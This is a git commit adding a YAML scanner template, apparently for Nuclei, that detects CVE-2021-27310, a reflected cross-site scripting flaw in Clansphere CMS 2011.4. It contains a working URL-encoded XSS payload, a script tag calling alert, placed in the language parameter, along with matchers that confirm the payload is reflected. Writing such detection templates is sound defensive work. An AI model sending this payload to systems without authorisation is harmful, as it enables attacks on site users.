Create CVE-2021-27310.yaml

2021-11-24 17:37:37 +02:00 · 2021-11-24 17:37:37 +02:00 · 50f0007efc
parent 0d2a2f4e15
commit 50f0007efc
1 changed files with 29 additions and 0 deletions
--- a/CVE-2021-27310.yaml
+++ b/CVE-2021-27310.yaml
@ -0,0 +1,29 @@
+id: CVE-2021-27310
+
+info:
+  name: Clansphere CMS 2011.4 - Reflected Cross-Site Scripting (XSS)
+  author: alph4byt3
+  severity: medium
+  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27310
+  tags: xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3CScRiPt%20%3Ealert(9735)%3C/ScRiPt%3E&module=module'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<ScRiPt >alert(9735)</ScRiPt>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200